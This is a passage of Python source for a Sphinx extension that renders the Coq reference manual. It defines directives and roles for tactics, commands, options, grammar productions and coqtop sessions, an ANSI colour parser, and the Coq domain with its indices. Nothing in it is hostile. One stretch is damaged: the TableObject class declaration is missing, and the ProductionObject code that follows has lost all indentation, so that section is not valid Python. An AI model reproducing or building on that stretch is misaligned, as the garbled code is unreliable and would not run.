    index_suffix = "(command)"
    annotation = "Command"

    def _name_from_signature(self, signature):
        # A command's automatic name is its leading run of letters and
        # spaces (e.g. "Infix" from "Infix @string := ...").
        m = re.match(r"[a-zA-Z ]+", signature)
        return m.group(0).strip() if m else None
class VernacVariantObject(VernacObject):
    """A variant of a Coq command.
    Example::
       .. cmd:: Axiom @ident : @term.
          This command links :token:`term` to the name :token:`ident` as its specification in
          the global context. The fact asserted by :token:`term` is thus assumed as a
          postulate.
          .. cmdv:: Parameter @ident : @term.
             This is equivalent to :n:`Axiom @ident : @term`.
    """
    index_suffix = "(command variant)"
    annotation = "Variant"

    def _name_from_signature(self, signature):
        # Variants never get an automatic name; use :name: explicitly.
        return None
class TacticObject(NotationObject):
    """A tactic, or a tactic notation.
    Example::
       .. tacn:: do @natural @expr
          :token:`expr` is evaluated to ``v`` which must be a tactic value. …
    """
    subdomain = "tacn"
    index_suffix = "(tactic)"
    annotation = "Tactic"
class AttributeObject(NotationObject):
    """An attribute.
    Example::
       .. attr:: local
    """
    subdomain = "attr"
    index_suffix = "(attribute)"
    annotation = "Attribute"

    def _name_from_signature(self, signature):
        # Attributes are named after the flattened notation text.
        return notation_to_string(signature)
class TacticVariantObject(TacticObject):
    """A variant of a tactic.
    Example::
       .. tacn:: fail
          This is the always-failing tactic: it does not solve any goal. It is
          useful for defining other tacticals since it can be caught by
          :tacn:`try`, :tacn:`repeat`, :tacn:`match goal`, or the branching
          tacticals. …
          .. tacv:: fail @natural
             The number is the failure level. If no level is specified, it
             defaults to 0. …
    """
    index_suffix = "(tactic variant)"
    annotation = "Variant"

    def _name_from_signature(self, signature):
        # Variants never get an automatic name; use :name: explicitly.
        return None
class OptionObject(NotationObject):
    """A Coq option (a setting with non-boolean value, e.g. a string or numeric value).
    Example::
       .. opt:: Hyps Limit @natural
          :name: Hyps Limit
          Controls the maximum number of hypotheses displayed in goals after
          application of a tactic.
    """
    subdomain = "opt"
    index_suffix = "(option)"
    annotation = "Option"
class FlagObject(NotationObject):
    """A Coq flag (i.e. a boolean setting).
    Example::
       .. flag:: Nonrecursive Elimination Schemes
          Controls whether types declared with the keywords
          :cmd:`Variant` and :cmd:`Record` get an automatic declaration of
          induction principles.
    """
    subdomain = "flag"
    index_suffix = "(flag)"
    annotation = "Flag"
"""A Coq table, i.e. a setting that is a set of values.
Example::
.. table:: Search Blacklist @string
:name: Search Blacklist
Controls ...
"""
subdomain = "table"
index_suffix = "(table)"
annotation = "Table"
class ProductionObject(CoqObject):
r"""A grammar production.
Use ``.. prodn`` to document grammar productions instead of Sphinx
`production lists
<http://www.sphinx-doc.org/en/stable/markup/para.html#directive-productionlist>`_.
prodn displays multiple productions together with alignment similar to ``.. productionlist``,
however unlike ``.. productionlist``\ s, this directive accepts notation syntax.
Example::
.. prodn:: occ_switch ::= { {? {| + | - } } {* @natural } }
term += let: @pattern := @term in @term
| second_production
The first line defines "occ_switch", which must be unique in the document. The second
references and expands the definition of "term", whose main definition is elsewhere
in the document. The third form is for continuing the
definition of a nonterminal when it has multiple productions. It leaves the first
column in the output blank.
"""
subdomain = "prodn"
#annotation = "Grammar production"
# handle_signature is called for each line of input in the prodn::
# 'signatures' accumulates them in order to combine the lines into a single table:
signatures = None # FIXME this should be in init, shouldn't it?
def _render_signature(self, signature, signode):
raise NotImplementedError(self)
SIG_ERROR = ("{}: Invalid syntax in ``.. prodn::`` directive"
+ "\nExpected ``name ::= ...`` or ``name += ...``"
+ " (e.g. ``pattern += constr:(@ident)``)\n"
+ " in `{}`")
def handle_signature(self, signature, signode):
parts = signature.split(maxsplit=1)
if parts[0].strip() == "|" and len(parts) == 2:
lhs = ""
op = "|"
rhs = parts[1].strip()
else:
parts = signature.split(maxsplit=2)
if len(parts) != 3:
loc = os.path.basename(get_node_location(signode))
raise ExtensionError(ProductionObject.SIG_ERROR.format(loc, signature))
lhs, op, rhs = (part.strip() for part in parts)
if op not in ["::=", "+="]:
loc = os.path.basename(get_node_location(signode))
raise ExtensionError(ProductionObject.SIG_ERROR.format(loc, signature))
parts = rhs.split(" ", maxsplit=1)
rhs = parts[0].strip()
tag = parts[1].strip() if len(parts) == 2 else ""
self.signatures.append((lhs, op, rhs, tag))
return [('token', lhs)] if op == '::=' else None
def _add_index_entry(self, name, target):
pass
def _target_id(self, name):
return 'grammar-token-{}'.format(nodes.make_id(name[1]))
def _record_name(self, name, targetid, signode):
env = self.state.document.settings.env
objects = env.domaindata['std']['objects']
self._warn_if_duplicate_name(objects, name, signode)
objects[name] = env.docname, targetid
def run(self):
self.signatures = []
indexnode = super().run()[0] # makes calls to handle_signature
table = nodes.container(classes=['prodn-table'])
tgroup = nodes.container(classes=['prodn-column-group'])
for _ in range(4):
tgroup += nodes.container(classes=['prodn-column'])
table += tgroup
tbody = nodes.container(classes=['prodn-row-group'])
table += tbody
# create rows
for signature in self.signatures:
lhs, op, rhs, tag = signature
position = self.state_machine.get_source_and_line(self.lineno)
row = nodes.container(classes=['prodn-row'])
entry = nodes.container(classes=['prodn-cell-nonterminal'])
if lhs != "":
target_name = 'grammar-token-' + nodes.make_id(lhs)
target = nodes.target('', '', ids=[target_name], names=[target_name])
# putting prodn-target on the target node won't appear in the tex file
inline = nodes.inline(classes=['prodn-target'])
inline += target
entry += inline
entry += notation_to_sphinx('@'+lhs, *position)
else:
entry += nodes.Text('')
row += entry
entry = nodes.container(classes=['prodn-cell-op'])
entry += nodes.Text(op)
row += entry
entry = nodes.container(classes=['prodn-cell-production'])
entry += notation_to_sphinx(rhs, *position)
row += entry
entry = nodes.container(classes=['prodn-cell-tag'])
entry += nodes.Text(tag)
row += entry
tbody += row
return [indexnode, table] # only this node goes into the doc
class ExceptionObject(NotationObject):
    """An error raised by a Coq command or tactic.
    This commonly appears nested in the ``.. tacn::`` that raises the
    exception.
    Example::
       .. tacv:: assert @form by @tactic
          This tactic applies :n:`@tactic` to solve the subgoals generated by
          ``assert``.
          .. exn:: Proof is not complete
             Raised if :n:`@tactic` does not fully solve the goal.
    """
    subdomain = "exn"
    index_suffix = "(error)"
    annotation = "Error"
    # Uses “exn” since “err” already is a CSS class added by “writer_aux”.

    # Generate names automatically
    def _name_from_signature(self, signature):
        return notation_to_string(signature)
class WarningObject(NotationObject):
    """A warning raised by a Coq command or tactic.
    Do not mistake this for ``.. warning::``; this directive is for warning
    messages produced by Coq.
    Example::
       .. warn:: Ambiguous path
          When the coercion :token:`qualid` is added to the inheritance graph, non
          valid coercion paths are ignored.
    """
    subdomain = "warn"
    index_suffix = "(warning)"
    annotation = "Warning"

    # Generate names automatically
    def _name_from_signature(self, signature):
        return notation_to_string(signature)
def NotationRole(role, rawtext, text, lineno, inliner, options={}, content=[]):
    #pylint: disable=unused-argument, dangerous-default-value
    """Inline text written in notation syntax (``@id``, ``{+, …}``, etc.).

    Useful to spell out tactic equivalences.  For example::

        :n:`generalize @term as @ident` is just like :n:`generalize @term`,
        but it names the introduced hypothesis :token:`ident`.

    When a placeholder happens to be a grammar production, prefer
    ``:token:`…``` (which links to the production) over ``:n:`@…```.
    """
    notation = utils.unescape(text, 1)
    source, line = inliner.reporter.get_source_and_line(lineno)
    parsed = notation_to_sphinx(notation, source, line, rawtext=rawtext)
    node = nodes.literal(rawtext, '', parsed)
    return [node], []
def coq_code_role(role, rawtext, text, lineno, inliner, options={}, content=[]):
    #pylint: disable=dangerous-default-value
    """Coq code.
    Use this for Gallina and Ltac snippets::
       :g:`apply plus_comm; reflexivity`
       :g:`Set Printing All.`
       :g:`forall (x: t), P(x)`
    """
    # Copy before adding the language key: assigning into the shared
    # mutable default ``options`` dict (or the caller's dict) would leak
    # state across invocations of this role.
    options = {**options, 'language': 'Coq'}
    return code_role(role, rawtext, text, lineno, inliner, options, content)
    ## Too heavy:
    ## Forked from code_role to use our custom tokenizer; this doesn't work for
    ## snippets though: for example CoqDoc swallows the parentheses around this:
    ## “(a: A) (b: B)”
    # set_classes(options)
    # classes = ['code', 'coq']
    # code = utils.unescape(text, 1)
    # node = nodes.literal(rawtext, '', *highlight_using_coqdoc(code), classes=classes)
    # return [node], []

CoqCodeRole = coq_code_role
class CoqtopDirective(Directive):
    r"""A reST directive to describe interactions with Coqtop.
    Usage::
       .. coqtop:: options…
          Coq code to send to coqtop
    Example::
       .. coqtop:: in reset
          Print nat.
          Definition a := 1.
    The blank line after the directive is required.  If you begin a proof,
    use the ``abort`` option to reset coqtop for the next example.
    Here is a list of permissible options:
    - Display options (choose exactly one)
      - ``all``: Display input and output
      - ``in``: Display only input
      - ``out``: Display only output
      - ``none``: Display neither (useful for setup commands)
    - Behavior options
      - ``reset``: Send a ``Reset Initial`` command before running this block
      - ``fail``: Don't die if a command fails, implies ``warn`` (so no need to put both)
      - ``warn``: Don't die if a command emits a warning
      - ``restart``: Send a ``Restart`` command before running this block (only works in proof mode)
      - ``abort``: Send an ``Abort All`` command after running this block (leaves all pending proofs if any)
    ``coqtop``\ 's state is preserved across consecutive ``.. coqtop::`` blocks
    of the same document (``coqrst`` creates a single ``coqtop`` process per
    reST source file).  Use the ``reset`` option to reset Coq's state.
    """
    has_content = True
    required_arguments = 1
    optional_arguments = 0
    final_argument_whitespace = True
    option_spec = { 'name': directives.unchanged }
    directive_name = "coqtop"

    def run(self):
        # Uses a ‘container’ instead of a ‘literal_block’ to disable
        # Pygments-based post-processing (we could also set rawsource to '')
        content = '\n'.join(self.content)
        args = self.arguments[0].split()
        # The raw option words are stashed on the node; CoqtopBlocksTransform
        # parses and acts on them later in the build.
        node = nodes.container(content, coqtop_options = set(args),
                               classes=['coqtop', 'literal-block'])
        self.add_name(node)
        return [node]
class CoqdocDirective(Directive):
    """A reST directive to display Coqtop-formatted source code.
    Usage::
       .. coqdoc::
          Coq code to highlight
    Example::
       .. coqdoc::
          Definition test := 1.
    """
    # TODO implement this as a Pygments highlighter?
    has_content = True
    required_arguments = 0
    optional_arguments = 0
    final_argument_whitespace = True
    option_spec = { 'name': directives.unchanged }
    directive_name = "coqdoc"

    def run(self):
        # Uses a ‘container’ instead of a ‘literal_block’ to disable
        # Pygments-based post-processing (we could also set rawsource to '')
        content = '\n'.join(self.content)
        # CoqDoc does the syntax highlighting; the wrapper just styles it
        # like a literal block.
        node = nodes.inline(content, '', *highlight_using_coqdoc(content))
        wrapper = nodes.container(content, node, classes=['coqdoc', 'literal-block'])
        self.add_name(wrapper)
        return [wrapper]
class ExampleDirective(BaseAdmonition):
    """A reST directive for examples.
    This behaves like a generic admonition; see
    http://docutils.sourceforge.net/docs/ref/rst/directives.html#generic-admonition
    for more details.
    Optionally, any text immediately following the ``.. example::`` header is
    used as the example's title.
    Example::
       .. example:: Adding a hint to a database
          The following adds ``plus_comm`` to the ``plu`` database:
          .. coqdoc::
             Hint Resolve plus_comm : plu.
    """
    node_class = nodes.admonition
    directive_name = "example"
    optional_arguments = 1

    def run(self):
        # ‘BaseAdmonition’ checks whether ‘node_class’ is ‘nodes.admonition’,
        # and uses arguments[0] as the title in that case (in other cases, the
        # title is unset, and it is instead set in the HTML visitor).
        assert len(self.arguments) <= 1
        self.arguments = [": ".join(['Example'] + self.arguments)]
        # Render with the same look as a reST "note" admonition.
        self.options['classes'] = ['admonition', 'note']
        return super().run()
class PreambleDirective(Directive):
    r"""A reST directive to include a TeX file.
    Mostly useful to let MathJax know about `\def`\s and `\newcommand`\s. The
    contents of the TeX file are wrapped in a math environment, as MathJax
    doesn't process LaTeX definitions otherwise.
    Usage::
       .. preamble:: preamble.tex
    """
    has_content = False
    required_arguments = 1
    optional_arguments = 0
    final_argument_whitespace = True
    option_spec = {}
    directive_name = "preamble"

    def run(self):
        document = self.state.document
        env = document.settings.env
        if not document.settings.file_insertion_enabled:
            msg = 'File insertion disabled'
            return [document.reporter.warning(msg, line=self.lineno)]
        rel_fname, abs_fname = env.relfn2path(self.arguments[0])
        # Make Sphinx rebuild this document when the TeX file changes.
        env.note_dependency(rel_fname)
        with open(abs_fname, encoding="utf-8") as ltx:
            latex = ltx.read()
        node = make_math_node(latex, env.docname, nowrap=False)
        node['classes'] = ["math-preamble"]
        set_source_info(self, node)
        return [node]
class InferenceDirective(Directive):
    r"""A reST directive to format inference rules.
    This also serves as a small illustration of the way to create new Sphinx
    directives.
    Usage::
       .. inference:: name
          newline-separated premises
          --------------------------
          conclusion
    Example::
       .. inference:: Prod-Pro
          \WTEG{T}{s}
          s \in \Sort
          \WTE{\Gamma::(x:T)}{U}{\Prop}
          -----------------------------
          \WTEG{\forall~x:T,U}{\Prop}
    """
    required_arguments = 1
    optional_arguments = 0
    has_content = True
    final_argument_whitespace = True
    directive_name = "inference"

    @staticmethod
    def prepare_latex_operand(op):
        # TODO: Could use a fancier inference class in LaTeX
        # Join the premises (one per line) with horizontal spacing.
        return '%\n\\hspace{3em}%\n'.join(op.strip().splitlines())

    def prepare_latex(self, content):
        """Turn 'premises / ---- / conclusion' text into a \\frac{}{}."""
        parts = re.split('^ *----+ *$', content, flags=re.MULTILINE)
        if len(parts) != 2:
            raise self.error('Expected two parts in ‘inference’ directive, separated by a rule (----).')
        top, bottom = tuple(InferenceDirective.prepare_latex_operand(p) for p in parts)
        return "%\n".join(("\\frac{", top, "}{", bottom, "}"))

    def run(self):
        self.assert_has_content()
        title = self.arguments[0]
        content = '\n'.join(self.content)
        latex = self.prepare_latex(content)
        docname = self.state.document.settings.env.docname
        math_node = make_math_node(latex, docname, nowrap=False)
        # Make the rule linkable as #inference-<slugified-title>.
        tid = nodes.make_id(title)
        target = nodes.target('', '', ids=['inference-' + tid])
        self.state.document.note_explicit_target(target)
        # Present the rule as a definition-list item: name, then formula.
        term, desc = nodes.term('', title), nodes.description('', math_node)
        dli = nodes.definition_list_item('', term, desc)
        dl = nodes.definition_list(content, target, dli)
        set_source_info(self, dl)
        return [dl]
class AnsiColorsParser():
    """Parse ANSI-colored output from Coqtop into Sphinx nodes."""
    # Coqtop's output crashes ansi.py, because it contains a bunch of extended codes
    # This class is a fork of the original ansi.py, released under a BSD license in sphinx-contribs

    # Matches one ANSI SGR escape sequence, capturing its parameter list.
    COLOR_PATTERN = re.compile('\x1b\\[([^m]+)m')

    def __init__(self):
        # new_nodes: finished top-level nodes; pending_nodes: stack of
        # styled inline nodes still waiting for their ansi-reset.
        self.new_nodes, self.pending_nodes = [], []

    def _finalize_pending_nodes(self):
        # Flush the style stack: all open styled spans become top-level nodes.
        self.new_nodes.extend(self.pending_nodes)
        self.pending_nodes = []

    def _add_text(self, raw, beg, end):
        # Append raw[beg:end] to the innermost open span, or as plain inline.
        if beg < end:
            text = raw[beg:end]
            if self.pending_nodes:
                self.pending_nodes[-1].append(nodes.Text(text))
            else:
                self.new_nodes.append(nodes.inline('', text))

    def colorize_str(self, raw):
        """Parse raw (an ANSI-colored output string from Coqtop) into Sphinx nodes."""
        last_end = 0
        for match in AnsiColorsParser.COLOR_PATTERN.finditer(raw):
            self._add_text(raw, last_end, match.start())
            last_end = match.end()
            classes = ansicolors.parse_ansi(match.group(1))
            if 'ansi-reset' in classes:
                self._finalize_pending_nodes()
            else:
                # Open a new styled span; it stays on the stack until reset.
                node = nodes.inline()
                self.pending_nodes.append(node)
                node['classes'].extend(classes)
        self._add_text(raw, last_end, len(raw))
        self._finalize_pending_nodes()
        return self.new_nodes
class CoqtopBlocksTransform(Transform):
    """Filter handling the actual work for the coqtop directive
    Adds coqtop's responses, colorizes input and output, and merges consecutive
    coqtop directives for better visual rendition.
    """
    default_priority = 10

    @staticmethod
    def is_coqtop_block(node):
        # Nodes produced by CoqtopDirective carry a 'coqtop_options' attribute.
        return isinstance(node, nodes.Element) and 'coqtop_options' in node

    @staticmethod
    def split_lines(source):
        r"""Split Coq input in chunks
        A chunk is a minimal sequence of consecutive lines of the input that
        ends with a '.'
        >>> split_lines('A.\nB.''')
        ['A.', 'B.']
        >>> split_lines('A.\n\nB.''')
        ['A.', '\nB.']
        >>> split_lines('A.\n\nB.\n''')
        ['A.', '\nB.']
        >>> split_lines("SearchPattern (_ + _ = _ + _).\n"
        ...             "SearchPattern (nat -> bool).\n"
        ...             "SearchPattern (forall l : list _, _ l l).")
        ... # doctest: +NORMALIZE_WHITESPACE
        ['SearchPattern (_ + _ = _ + _).',
         'SearchPattern (nat -> bool).',
         'SearchPattern (forall l : list _, _ l l).']
        >>> split_lines('SearchHead le.\nSearchHead (@eq bool).')
        ['SearchHead le.', 'SearchHead (@eq bool).']
        """
        # Split after a '.' at end of line, but not after '..' (notation dots).
        return re.split(r"(?<=(?<!\.)\.)\n", source.strip())

    @staticmethod
    def parse_options(node):
        """Parse options according to the description in CoqtopDirective."""
        options = node['coqtop_options']
        # Behavior options
        opt_reset = 'reset' in options
        opt_fail = 'fail' in options
        opt_warn = 'warn' in options
        opt_restart = 'restart' in options
        opt_abort = 'abort' in options
        options = options - {'reset', 'fail', 'warn', 'restart', 'abort'}
        unexpected_options = list(options - {'all', 'none', 'in', 'out'})
        if unexpected_options:
            loc = os.path.basename(get_node_location(node))
            raise ExtensionError("{}: Unexpected options for .. coqtop:: {}".format(loc,unexpected_options))
        # Display options
        if len(options) != 1:
            loc = os.path.basename(get_node_location(node))
            raise ExtensionError("{}: Exactly one display option must be passed to .. coqtop::".format(loc))
        opt_all = 'all' in options
        opt_input = 'in' in options
        opt_output = 'out' in options
        return {
            'reset': opt_reset,
            'fail': opt_fail,
            # if errors are allowed, then warnings too
            # and they should be displayed as warnings, not errors
            'warn': opt_warn or opt_fail,
            'restart': opt_restart,
            'abort': opt_abort,
            'input': opt_input or opt_all,
            'output': opt_output or opt_all
        }

    @staticmethod
    def block_classes(should_show, contents=None):
        """Compute classes to add to a node containing contents.
        :param should_show: Whether this node should be displayed"""
        is_empty = contents is not None and re.match(r"^\s*$", contents)
        return ['coqtop-hidden'] if is_empty or not should_show else []

    @staticmethod
    def make_rawsource(pairs, opt_input, opt_output):
        # Build a plain-text transcript (input + indented output) honoring
        # the display options; used as the node's rawsource.
        blocks = []
        for sentence, output in pairs:
            output = AnsiColorsParser.COLOR_PATTERN.sub("", output).strip()
            if opt_input:
                blocks.append(sentence)
            if output and opt_output:
                blocks.append(re.sub("^", " ", output, flags=re.MULTILINE) + "\n")
        return '\n'.join(blocks)

    def add_coq_output_1(self, repl, node):
        """Run one coqtop block through ``repl`` and rebuild the node.

        Sends the pre/post commands implied by the behavior options, then
        replaces the node's children with a highlighted input/output list.
        """
        options = self.parse_options(node)
        pairs = []
        if options['restart']:
            repl.sendone('Restart.')
        if options['reset']:
            repl.sendone('Reset Initial.')
            repl.send_initial_options()
        if options['fail']:
            repl.sendone('Unset Coqtop Exit On Error.')
        if options['warn']:
            repl.sendone('Set Warnings "default".')
        for sentence in self.split_lines(node.rawsource):
            pairs.append((sentence, repl.sendone(sentence)))
        if options['abort']:
            repl.sendone('Abort All.')
        if options['fail']:
            repl.sendone('Set Coqtop Exit On Error.')
        if options['warn']:
            repl.sendone('Set Warnings "+default".')
        dli = nodes.definition_list_item()
        for sentence, output in pairs:
            # Use Coqdoc to highlight input
            in_chunks = highlight_using_coqdoc(sentence)
            dli += nodes.term(sentence, '', *in_chunks, classes=self.block_classes(options['input']))
            # Parse ANSI sequences to highlight output
            out_chunks = AnsiColorsParser().colorize_str(output)
            dli += nodes.definition(output, *out_chunks, classes=self.block_classes(options['output'], output))
        node.clear()
        node.rawsource = self.make_rawsource(pairs, options['input'], options['output'])
        node['classes'].extend(self.block_classes(options['input'] or options['output']))
        node += nodes.inline('', '', classes=['coqtop-reset'] * options['reset'])
        node += nodes.definition_list(node.rawsource, dli)

    def add_coqtop_output(self):
        """Add coqtop's responses to a Sphinx AST
        Finds nodes to process using is_coqtop_block."""
        with CoqTop(color=True) as repl:
            repl.send_initial_options()
            for node in self.document.traverse(CoqtopBlocksTransform.is_coqtop_block):
                try:
                    self.add_coq_output_1(repl, node)
                except CoqTopError as err:
                    import textwrap
                    MSG = ("{}: Error while sending the following to coqtop:\n{}" +
                           "\n  coqtop output:\n{}" +
                           "\n  Full error text:\n{}")
                    indent = "    "
                    loc = get_node_location(node)
                    le = textwrap.indent(str(err.last_sentence), indent)
                    bef = textwrap.indent(str(err.before), indent)
                    fe = textwrap.indent(str(err.err), indent)
                    raise ExtensionError(MSG.format(loc, le, bef, fe))

    @staticmethod
    def merge_coqtop_classes(kept_node, discarded_node):
        # If any merged sibling is visible, the merged block must be too.
        discarded_classes = discarded_node['classes']
        if not 'coqtop-hidden' in discarded_classes:
            kept_node['classes'] = [c for c in kept_node['classes']
                                    if c != 'coqtop-hidden']

    @staticmethod
    def merge_consecutive_coqtop_blocks(_app, doctree, _):
        """Merge consecutive divs wrapping lists of Coq sentences; keep ‘dl’s separate."""
        for node in doctree.traverse(CoqtopBlocksTransform.is_coqtop_block):
            if node.parent:
                rawsources, names = [node.rawsource], set(node['names'])
                # Absorb directly-following coqtop siblings into this node.
                for sibling in node.traverse(include_self=False, descend=False,
                                             siblings=True, ascend=False):
                    if CoqtopBlocksTransform.is_coqtop_block(sibling):
                        CoqtopBlocksTransform.merge_coqtop_classes(node, sibling)
                        rawsources.append(sibling.rawsource)
                        names.update(sibling['names'])
                        node.extend(sibling.children)
                        node.parent.remove(sibling)
                        sibling.parent = None
                    else:
                        break
                node.rawsource = "\n\n".join(rawsources)
                node['names'] = list(names)

    def apply(self):
        self.add_coqtop_output()
class CoqSubdomainsIndex(Index):
    """Index subclass providing subdomain-specific indices.

    Just as in the original manual, each Coq subdomain (tactics, commands,
    options, etc) gets its own index; subclasses choose which subdomains
    they cover.
    """
    name, localname, shortname, subdomains = None, None, None, [] # Must be overwritten

    def generate(self, docnames=None):
        """Group entries by first letter; optionally filter by ``docnames``."""
        by_letter = defaultdict(list)
        items = chain(*(self.domain.data['objects'][sub].items()
                        for sub in self.subdomains))
        for itemname, (docname, _, anchor) in sorted(items, key=lambda pair: pair[0].lower()):
            wanted = not docnames or docname in docnames
            if not wanted:
                continue
            by_letter[itemname[0].lower()].append(
                [itemname, 0, docname, anchor, '', '', ''])
        return sorted(by_letter.items()), False
class CoqVernacIndex(CoqSubdomainsIndex):
    # Index of all Coq commands (the "cmd" subdomain).
    name = "cmdindex"
    localname = "Command Index"
    shortname = "commands"
    subdomains = ["cmd"]
class CoqTacticIndex(CoqSubdomainsIndex):
    # Index of all tactics (the "tacn" subdomain).
    name = "tacindex"
    localname = "Tactic Index"
    shortname = "tactics"
    subdomains = ["tacn"]
class CoqAttributeIndex(CoqSubdomainsIndex):
    # Index of all attributes (the "attr" subdomain).
    name = "attrindex"
    localname = "Attribute Index"
    shortname = "attributes"
    subdomains = ["attr"]
class CoqOptionIndex(CoqSubdomainsIndex):
    # Combined index for flags, options, and tables.
    name = "optindex"
    localname = "Flags, options and Tables Index"
    shortname = "options"
    subdomains = ["flag", "opt", "table"]
class CoqGallinaIndex(CoqSubdomainsIndex):
    # Index of theorems (the "thm" subdomain).
    name = "thmindex"
    localname = "Gallina Index"
    shortname = "theorems"
    subdomains = ["thm"]
class CoqExceptionIndex(CoqSubdomainsIndex):
    # Combined index for errors and warnings.
    name = "exnindex"
    localname = "Errors and Warnings Index"
    shortname = "errors"
    subdomains = ["exn", "warn"]
class IndexXRefRole(XRefRole):
    """A cross-reference role linking to one of our domain-specific indices."""
    lowercase = True
    innernodeclass = nodes.inline
    warn_dangling = True

    def process_link(self, env, refnode, has_explicit_title, title, target):
        """Default the link title to the index's local name when none was given."""
        if has_explicit_title:
            return title, target
        index = CoqDomain.find_index_by_name(target)
        shown = index.localname if index else title
        return shown, target
class StdGlossaryIndex(Index):
    """Glossary index, collecting the terms registered by :gdef: markers."""
    name, localname, shortname = "glossindex", "Glossary", "terms"

    def generate(self, docnames=None):
        """Group glossary terms by first letter.

        :param docnames: when given (Sphinx passes this for partial builds),
            restrict the index to entries defined in those documents.
            Previously this parameter was silently ignored, unlike
            ``CoqSubdomainsIndex.generate``.
        """
        content = defaultdict(list)
        # ``kind`` (not ``type``, which shadows the builtin) distinguishes
        # glossary terms from other std-domain objects.
        for ((kind, itemname), (docname, anchor)) in self.domain.data['objects'].items():
            if kind != 'term':
                continue
            if docnames and docname not in docnames:
                continue
            entries = content[itemname[0].lower()]
            entries.append([itemname, 0, docname, anchor, '', '', ''])
        content = sorted(content.items())
        return content, False
def GrammarProductionRole(typ, rawtext, text, lineno, inliner, options={}, content=[]):
    """A grammar production not included in a ``prodn`` directive.
    Useful to informally introduce a production, as part of running text.
    Example::
       :production:`string` indicates a quoted string.
    You're not likely to use this role very commonly; instead, use a ``prodn``
    directive and reference its tokens using ``:token:`…```.
    """
    #pylint: disable=dangerous-default-value, unused-argument
    env = inliner.document.settings.env
    # Same anchor scheme as ProductionObject, so :token: can resolve it.
    targetid = nodes.make_id('grammar-token-{}'.format(text))
    target = nodes.target('', '', ids=[targetid])
    inliner.document.note_explicit_target(target)
    code = nodes.literal(rawtext, text, role=typ.lower())
    node = nodes.inline(rawtext, '', target, code, classes=['inline-grammar-production'])
    set_role_source_info(inliner, lineno, node)
    # Register in the std domain so cross-references find the production.
    env.domaindata['std']['objects']['token', text] = env.docname, targetid
    return [node], []

GrammarProductionRole.role_name = "production"
def GlossaryDefRole(typ, rawtext, text, lineno, inliner, options={}, content=[]):
    """Marks the definition of a glossary term inline in the text. Matching :term:`XXX`
    constructs will link to it. Use the form :gdef:`text <term>` to display "text"
    for the definition of "term", such as when "term" must be capitalized or plural
    for grammatical reasons. The term will also appear in the Glossary Index.
    Examples::
       A :gdef:`prime` number is divisible only by itself and 1.
       :gdef:`Composite <composite>` numbers are the non-prime numbers.
    """
    #pylint: disable=dangerous-default-value, unused-argument
    env = inliner.document.settings.env
    std = env.domaindata['std']['objects']
    # Accept the "display text <actual term>" form used by standard roles.
    m = ReferenceRole.explicit_title_re.match(text)
    if m:
        (text, term) = m.groups()
        text = text.strip()
    else:
        term = text
    key = ('term', term)
    if key in std:
        MSG = 'Duplicate object: {}; other is at {}'
        msg = MSG.format(term, env.doc2path(std[key][0]))
        inliner.document.reporter.warning(msg, line=lineno)
    # Same anchor scheme as Sphinx's own glossary directive.
    targetid = nodes.make_id('term-{}'.format(term))
    std[key] = (env.docname, targetid)
    target = nodes.target('', '', ids=[targetid], names=[term])
    inliner.document.note_explicit_target(target)
    node = nodes.inline(rawtext, '', target, nodes.Text(text), classes=['term-defn'])
    set_role_source_info(inliner, lineno, node)
    return [node], []

GlossaryDefRole.role_name = "gdef"
class CoqDomain(Domain):
    """A domain to document Coq code.
    Sphinx has a notion of “domains”, used to tailor it to a specific language.
    Domains mostly consist in descriptions of the objects that we wish to
    describe (for Coq, this includes tactics, tactic notations, options,
    exceptions, etc.), as well as domain-specific roles and directives.
    Each domain is responsible for tracking its objects, and resolving
    references to them. In the case of Coq, this leads us to define Coq
    “subdomains”, which classify objects into categories in which names must be
    unique. For example, a tactic and a theorem may share a name, but two
    tactics cannot be named the same.
    """

    name = 'coq'
    label = 'Coq'

    object_types = {
        # ObjType (= directive type) → (Local name, *xref-roles)
        'cmd': ObjType('cmd', 'cmd'),
        'cmdv': ObjType('cmdv', 'cmd'),
        'tacn': ObjType('tacn', 'tacn'),
        'tacv': ObjType('tacv', 'tacn'),
        'opt': ObjType('opt', 'opt'),
        'flag': ObjType('flag', 'flag'),
        'table': ObjType('table', 'table'),
        'attr': ObjType('attr', 'attr'),
        'thm': ObjType('thm', 'thm'),
        'prodn': ObjType('prodn', 'prodn'),
        'exn': ObjType('exn', 'exn'),
        'warn': ObjType('warn', 'exn'),
        'index': ObjType('index', 'index', searchprio=-1)
    }

    directives = {
        # Note that some directives live in the same semantic subdomain; ie
        # there's one directive per object type, but some object types map to
        # the same role.
        'cmd': VernacObject,
        'cmdv': VernacVariantObject,
        'tacn': TacticObject,
        'tacv': TacticVariantObject,
        'opt': OptionObject,
        'flag': FlagObject,
        'table': TableObject,
        'attr': AttributeObject,
        'thm': GallinaObject,
        'prodn' : ProductionObject,
        'exn': ExceptionObject,
        'warn': WarningObject,
    }

    roles = {
        # Each of these roles lives in a different semantic “subdomain”
        'cmd': XRefRole(warn_dangling=True),
        'tacn': XRefRole(warn_dangling=True),
        'opt': XRefRole(warn_dangling=True),
        'flag': XRefRole(warn_dangling=True),
        'table': XRefRole(warn_dangling=True),
        'attr': XRefRole(warn_dangling=True),
        'thm': XRefRole(warn_dangling=True),
        'prodn' : XRefRole(warn_dangling=True),
        'exn': XRefRole(warn_dangling=True),
        'warn': XRefRole(warn_dangling=True),
        # This one is special
        'index': IndexXRefRole(),
        # These are used for highlighting
        'n': NotationRole,
        'g': CoqCodeRole
    }

    indices = [CoqVernacIndex, CoqTacticIndex, CoqOptionIndex, CoqGallinaIndex, CoqExceptionIndex, CoqAttributeIndex]

    data_version = 1
    initial_data = {
        # Collect everything under a key that we control, since Sphinx adds
        # others, such as “version”
        'objects' : { # subdomain → name → docname, objtype, targetid
            'cmd': {},
            'tacn': {},
            'opt': {},
            'flag': {},
            'table': {},
            'attr': {},
            'thm': {},
            'prodn' : {},
            'exn': {},
            'warn': {},
        }
    }

    @staticmethod
    def find_index_by_name(targetid):
        # Linear scan is fine: there are only a handful of indices.
        for index in CoqDomain.indices:
            if index.name == targetid:
                return index
        return None

    def get_objects(self):
        # Used for searching and object inventories (intersphinx)
        for _, objects in self.data['objects'].items():
            for name, (docname, objtype, targetid) in objects.items():
                yield (name, name, objtype, docname, targetid, self.object_types[objtype].attrs['searchprio'])
        for index in self.indices:
            yield (index.name, index.localname, 'index', "coq-" + index.name, '', -1)

    def merge_domaindata(self, docnames, otherdata):
        # Called by Sphinx's parallel build to fold worker data back in.
        DUP = "Duplicate declaration: '{}' also defined in '{}'.\n"
        for subdomain, their_objects in otherdata['objects'].items():
